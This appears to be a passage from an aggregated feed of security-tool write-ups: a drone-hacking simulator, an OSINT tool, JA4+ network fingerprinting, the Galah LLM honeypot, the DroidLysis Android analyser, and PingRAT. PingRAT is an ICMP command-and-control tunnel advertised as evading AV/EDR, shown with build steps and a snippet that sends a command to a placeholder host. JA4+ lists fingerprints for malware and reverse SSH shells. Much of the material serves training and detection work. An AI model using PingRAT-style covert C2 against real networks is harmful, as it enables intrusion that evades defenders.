Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

By: Zion3R


The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


    About the Damn Vulnerable Drone


    What is the Damn Vulnerable Drone?

    The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

    Why was it built?

    The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

    Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

    The Damn Vulnerable Drone platform is open-source and free, specifically designed to address the substantial expenses often associated with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

    How does it work?

    The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

    ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.
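
    As a quick taste of what SITL exposes, the hedged Python sketch below connects to a simulated drone's MAVLink telemetry with pymavlink; the UDP endpoint shown is a common SITL default and an assumption here, not something this project documents.

    # Minimal sketch: read heartbeats and telemetry from an ArduPilot SITL
    # instance with pymavlink. udp:127.0.0.1:14550 is a common SITL default
    # and may differ in your setup.
    from pymavlink import mavutil

    conn = mavutil.mavlink_connection('udp:127.0.0.1:14550')
    conn.wait_heartbeat()  # block until the simulated flight controller is seen
    print(f"Heartbeat from system {conn.target_system}, component {conn.target_component}")

    for _ in range(5):
        # GLOBAL_POSITION_INT carries lat/lon in degE7 and altitude in millimetres
        msg = conn.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
        print(msg.lat / 1e7, msg.lon / 1e7, msg.relative_alt / 1000.0)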

    While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

    Features

    • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
    • Simulated Wireless Networking: Simulated Wi-Fi (802.11) interfaces to practice wireless drone attacks.
    • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
    • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
    • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
    • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
    • Dynamic Flight Logging: Fully dynamic ArduPilot flight bin logs stored on a simulated SD card.
    • Management Web Console: Simple-to-use simulator management web console for triggering scenarios and drone flight states.
    • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
    • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Zion3R

     


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface, simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    JA4+ - Suite Of Network Fingerprinting Standards

    By: Zion3R


    JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

    Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
    JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
    JA4T: TCP Fingerprinting (JA4T/TS/TScan)


    To understand how to read JA4+ fingerprints, see Technical Details

    This repo includes JA4+ in Python, Rust, Zeek, and C, as a Wireshark plugin.

    JA4/JA4+ support is being added to:
    GreyNoise
    Hunt
    Driftnet
    DarkSail
    Arkime
    GoLang (JA4X)
    Suricata
    Wireshark
    Zeek
    nzyme
    Netresec's CapLoader
    NetworkMiner">Netresec's NetworkMiner
    NGINX
    F5 BIG-IP
    nfdump
    ntop's ntopng
    ntop's nDPI
    Team Cymru
    NetQuest
    Censys
    Exploit.org's Netryx
    Cloudflare
    Fastly
    with more to be announced...

    Examples

    Application JA4+ Fingerprints
    Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
    JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
    JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
    JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
    IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
    IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
    JA4S=t120300_c030_5e2616a54c73
    Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
    JA4S=t130200_1301_a56c5b993250
    JA4X=000000000000_4f24da86fad6_bf0f0589fc03
    JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
    Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
    JA4X=2166164053c1_2166164053c1_30d204a01551
    SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
    JA4S=t130200_1302_a56c5b993250
    JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
    Qakbot JA4X=2bab15409345_af684594efb4_000000000000
    Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
    Darkgate JA4H=po10nn060000_cdb958d032b0
    LummaC2 JA4H=po11nn050000_d253db9d024b
    Evilginx JA4=t13d191000_9dc949149365_e7c285222651
    Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
    Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
    Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

    For more, see ja4plus-mapping.csv
    The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

    Plugins

    Wireshark
    Zeek
    Arkime

    Binaries

    Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

    Download the latest JA4 binaries from: Releases.

    JA4+ on Ubuntu

    sudo apt install tshark
    ./ja4 [options] [pcap]

    JA4+ on Mac

    1) Install Wireshark from https://www.wireshark.org/download.html, which will install tshark.
    2) Add tshark to $PATH:

    ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
    ./ja4 [options] [pcap]

    JA4+ on Windows

    1) Install Wireshark for Windows from https://www.wireshark.org/download.html, which will install tshark.exe.
    tshark.exe is located in the Wireshark install directory, for example: C:\Program Files\Wireshark\tshark.exe
    2) Add the location of tshark.exe to your "PATH" environment variable in Windows.
    (System properties > Environment Variables... > Edit Path)
    3) Open cmd and navigate to the ja4 folder:

    ja4 [options] [pcap]

    Database

    An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

    In the meantime, see ja4plus-mapping.csv

    Feel free to do a pull request with any JA4+ data you find.

    JA4+ Details

    JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

    All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

    For example, GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive number of completely different JA3 fingerprints, but with JA4, only the b part of the JA4 fingerprint changes; parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
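
    Because every JA4+ fingerprint is just underscore-delimited sections, pivoting on a subset of sections is a one-liner. A minimal sketch (the fingerprint is the Chrome example from the list above):

    # Split a JA4 fingerprint into its a/b/c sections and re-join a+c,
    # the same pivot GreyNoise uses to ignore a constantly-rotating cipher (b).
    ja4 = "t13d1516h2_8daaf6152771_02713d6af862"
    a, b, c = ja4.split("_")
    ja4_ac = f"{a}_{c}"  # stable even when the actor rotates ciphers
    print(ja4_ac)        # t13d1516h2_02713d6af862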

    Current methods and implementation details:
    | Full Name | Short Name | Description |
    |---|---|---|
    | JA4 | JA4 | TLS Client Fingerprinting |
    | JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
    | JA4HTTP | JA4H | HTTP Client Fingerprinting |
    | JA4Latency | JA4L | Latency Measurement / Light Distance |
    | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
    | JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
    | JA4TCP | JA4T | TCP Client Fingerprinting |
    | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
    | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

    The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

    To understand how to read JA4+ fingerprints, see Technical Details

    Licensing

    JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

    JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

    All JA4+ methods are patent pending.
    JA4+ is a trademark of FoxIO

    JA4+ can and is being implemented into open source tools, see the License FAQ for details.

    This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

    ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

    Q&A

    Q: Why are you sorting the ciphers? Doesn't the ordering matter?
    A: It does, but in our research we've found that applications and libraries choose a unique cipher list more often than a unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

    Q: Why are you sorting the extensions?
    A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

    So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

    Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
    A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions, and even though TLS 1.3 only supports a few ciphers, browsers and applications still support many more.
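
    A toy illustration of why sorting defeats randomization tactics such as cipher stunting and Chrome's extension shuffling: two shuffled orderings of the same list collapse to one value once sorted. (The hashing here is illustrative only, not the exact JA4 truncation rules.)

    import hashlib
    import random

    ciphers = ["1301", "1302", "1303", "c02b", "c02f"]

    def fingerprint(cipher_list):
        # Sort before hashing so that ordering no longer matters
        joined = ",".join(sorted(cipher_list))
        return hashlib.sha256(joined.encode()).hexdigest()[:12]

    shuffled = ciphers[:]
    random.shuffle(shuffled)
    assert fingerprint(ciphers) == fingerprint(shuffled)  # shuffling has no effect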

    JA4+ was created by:

    John Althouse, with feedback from:

    Josh Atkins
    Jeff Atkinson
    Joshua Alexander
    W.
    Joe Martin
    Ben Higgins
    Andrew Morris
    Chris Ueland
    Ben Schofield
    Matthias Vallentin
    Valeriy Vorotyntsev
    Timothy Noel
    Gary Lipsky
    And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

    Contact John Althouse at john@foxio.io for licensing and questions.

    Copyright (c) 2024, FoxIO



    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go
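
    PingRAT itself is written in Go, but the core idea (smuggling bytes in ICMP echo payloads) can be sketched in a few lines of Python with scapy. This is illustrative only: the destination address and payload are placeholders, and a cooperating server is assumed on the other end.

    # Illustrative only: carry arbitrary bytes inside an ICMP echo request.
    # Requires root privileges to craft raw packets.
    from scapy.all import IP, ICMP, Raw, sr1

    reply = sr1(
        IP(dst="192.0.2.10") / ICMP(type=8) / Raw(load=b"whoami"),  # type 8 = echo request
        timeout=2,
        verbose=False,
    )
    if reply and reply.haslayer(Raw):
        print(reply[Raw].load)  # a cooperating server answers in the echo reply payload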

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
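
    A minimal sketch of that per-port caching behavior (Galah itself is written in Go; this Python sketch and its names are illustrative only):

    import time

    CACHE_TTL = 3600  # seconds; in Galah the duration is set in the config file
    _cache = {}

    def cached_response(port, request_key, generate):
        """Return a cached response per (port, request), regenerating on expiry."""
        key = (port, request_key)  # the port is part of the key, so another port misses
        hit = _cache.get(key)
        if hit and time.time() - hit[0] < CACHE_TTL:
            return hit[1]
        response = generate()  # the expensive LLM API call
        _cache[key] = (time.time(), response)
        return response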

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    ██████ █████ ██ █████ ██ ██
    ██ ██ ██ ██ ██ ██ ██ ██
    ██ ███ ███████ ██ ███████ ███████
    ██ ██ ██ ██ ██ ██ ██ ██ ██
    ██████ ██ ██ ███████ ██ ██ ██ ██
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    😑

    % curl http://localhost:8888/i-mean-are-you-a-fake-server
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    DroidLysis - Property Extractor For Android Apps

    By: Zion3R


    DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

    DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


    Installing DroidLysis

    1. Install required system packages
    sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
    2. Install Android disassembly tools: Apktool, Baksmali, and optionally Dex2jar and the (obsolete) Procyon (note that Procyon only works with Java 8, not Java 11).
    $ mkdir -p ~/softs
    $ cd ~/softs
    $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
    $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
    $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
    $ unzip dex-tools-v2.4.zip
    $ rm -f dex-tools-v2.4.zip
    3. Get DroidLysis from the Git repository (preferred) or from pip

    Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

    $ python3 -m venv venv
    $ source ./venv/bin/activate
    (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

    Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

    4. Configure conf/general.conf. In particular, make sure to replace /home/axelle with your own directories.
    [tools]
    apktool = /home/axelle/softs/apktool_2.9.3.jar
    baksmali = /home/axelle/softs/baksmali-2.5.2.jar
    dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
    procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
    keytool = /usr/bin/keytool
    ...
    5. Run it:
    python3 ./droidlysis3.py --help

    Configuration

    The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the names of the pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql).

    Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

    Usage

    DroidLysis uses Python 3. To launch it and get options:

    droidlysis --help

    For example, test it on Signal's APK:

    droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

    DroidLysis outputs:

    • A summary on the console (see image above)
    • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
    • A database (by default, SQLite droidlysis.db) containing properties it noticed.

    Options

    Get usage with droidlysis --help

    • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP and RAR archives. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.

    • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

    • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

    • DroidLysis's analysis does not inspect known third-party SDKs by default, i.e., it won't report any suspicious activity from them. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

    Sample output directory (--output DIR)

    This directory contains (when applicable):

    • A readable AndroidManifest.xml
    • Readable resources in res
    • Libraries lib, assets assets
    • Disassembled Smali code: smali (and others)
    • Package meta information: META-INF
    • Package contents when simply unzipped in ./unzipped
    • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

    The following files are generated by DroidLysis:

    • autoanalysis.md: lists each pattern DroidLysis detected and where.
    • report.md: same as what was printed on the console

    If you do not need the sample output directory to be generated, use the option --clearoutput.

    Import trackers from Exodus etc (--import-exodus)

    $ python3 ./droidlysis3.py --import-exodus --verbose
    Processing file: ./droidurl.pyc ...
    DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
    DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
    DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
    DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
    DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
    DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

    Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

    SQLite database

    If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table corresponds to a given sample, and each column is a property DroidLysis tracks.

    For example, to retrieve the filename, SHA256 sum and smali properties of each sample in the database:

    sqlite> select sha256, sanitized_basename, smali_properties from samples;
    f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
    ...

    Property patterns

    What DroidLysis detects can be configured and extended in the files of the ./conf directory.

    A pattern consists of:

    • a tag name, e.g. send_sms. This names the property and must be unique across the .conf file.
    • a pattern: a regexp to be matched, e.g. ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against the Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
    • a description (optional): explains the importance of the property and what it means.
    [send_sms]
    pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
    description=Sending SMS messages
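
    Applying such a pattern is plain regular-expression matching over the disassembled Smali. A hedged sketch of the idea (the Smali line is a made-up example):

    import re

    # The send_sms pattern from smali.conf, applied to one line of Smali code.
    pattern = re.compile(r";->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage")

    smali_line = ("invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;"
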